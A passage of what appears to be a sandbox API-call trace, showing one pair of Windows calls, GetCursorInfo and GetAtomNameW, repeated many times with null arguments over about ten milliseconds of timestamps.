GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0086.477] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0086.477] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0086.477] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0086.477] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0086.477] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0086.477] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0086.477] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0086.477] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0086.477] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0086.477] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0086.477] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0086.477] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0086.477] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0086.477] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0086.477] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0086.477] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0086.477] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0086.477] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0086.477] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0086.477] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0086.477] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0086.478] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0086.478] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0086.478] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0086.478] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0086.478] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0086.478] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0086.478] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0086.478] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0086.478] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0086.478] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0086.478] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0086.478] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0086.478] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0086.478] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0086.478] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0086.478] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0086.478] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0086.478] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0086.478] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0086.478] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0086.478] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0086.478] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0086.478] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0086.478] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0086.478] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0086.478] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0086.478] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0086.478] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0086.478] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0086.479] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0086.479] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0086.479] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0086.479] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0086.479] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0086.479] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0086.479] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0086.479] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0086.479] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0086.479] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0086.479] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0086.479] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0086.479] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0086.479] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0086.479] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0086.479] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0086.479] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0086.479] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0086.479] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0086.479] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0086.479] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0086.479] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0086.479] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0086.479] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0086.479] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0086.479] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0086.479] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0086.479] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0086.479] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0086.480] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0086.480] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0086.480] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0086.480] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0086.480] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0086.480] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0086.480] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0086.480] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0086.480] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0086.480] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0086.480] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0086.480] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0086.480] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0086.480] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0086.480] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0086.480] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0086.480] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0086.480] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0086.480] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0086.480] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0086.480] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0086.480] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0086.480] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0086.480] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0086.480] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0086.480] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0086.480] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0086.480] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0086.480] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0086.481] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0086.481] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0086.481] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0086.481] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0086.481] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0086.481] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0086.481] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0086.481] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0086.481] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0086.481] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0086.481] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0086.481] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0086.481] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0086.481] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0086.481] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0086.481] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0086.481] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0086.481] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0086.481] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0086.481] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0086.481] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0086.481] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0086.481] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0086.481] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0086.481] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0086.481] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0086.481] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0086.481] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0086.481] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0086.482] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0086.482] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0086.482] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0086.482] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0086.482] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0086.482] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0086.482] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0086.482] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0086.482] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0086.482] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0086.482] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0086.482] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0086.482] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0086.482] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0086.482] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0086.482] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0086.482] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0086.482] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0086.482] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0086.482] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0086.482] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0086.482] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0086.482] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0086.482] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0086.482] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0086.482] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0086.482] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0086.482] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0086.482] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0086.483] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0086.483] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0086.483] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0086.483] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0086.483] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0086.483] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0086.483] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0086.483] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0086.483] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0086.483] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0086.483] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0086.483] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0086.483] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0086.483] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0086.483] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0086.483] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0086.483] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0086.483] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0086.483] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0086.483] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0086.483] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0086.483] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0086.483] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0086.483] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0086.483] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0086.483] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0086.483] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0086.483] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0086.483] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0086.484] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0086.484] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0086.484] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0086.484] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0086.484] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0086.484] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0086.484] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0086.484] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0086.484] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0086.484] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0086.484] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0086.484] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0086.484] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0086.484] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0086.484] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0086.484] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0086.484] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0086.484] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0086.484] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0086.484] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0086.484] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0086.484] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0086.484] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0086.484] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0086.484] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0086.484] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0086.484] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0086.484] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0086.484] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0086.485] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0086.485] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0086.485] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0086.485] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0086.485] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0086.485] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0086.485] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0086.485] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0086.485] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0086.485] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0086.485] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0086.485] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0086.485] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0086.485] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0086.485] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0086.485] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0086.485] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0086.485] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0086.485] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0086.485] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0086.485] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0086.485] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0086.485] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0086.485] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0086.485] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0086.485] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0086.485] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0086.485] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0086.485] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0086.486] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0086.486] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0086.486] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0086.486] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0086.486] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0086.486] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0086.486] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0086.486] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0086.486] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0086.486] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0086.486] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0086.486] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0086.486] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0086.486] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0086.486] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0086.486] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0086.486] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0086.486] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0086.486] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0086.486] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0086.486] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0086.486] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0086.486] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0086.486] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0086.486] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0086.486] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0086.486] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0086.486] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0086.486] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0086.487] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0086.487] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0086.487] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0086.487] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0086.487] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0086.487] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0086.487] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0086.487] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0086.487] GetAtomNameW (in: nAtom=0x0, 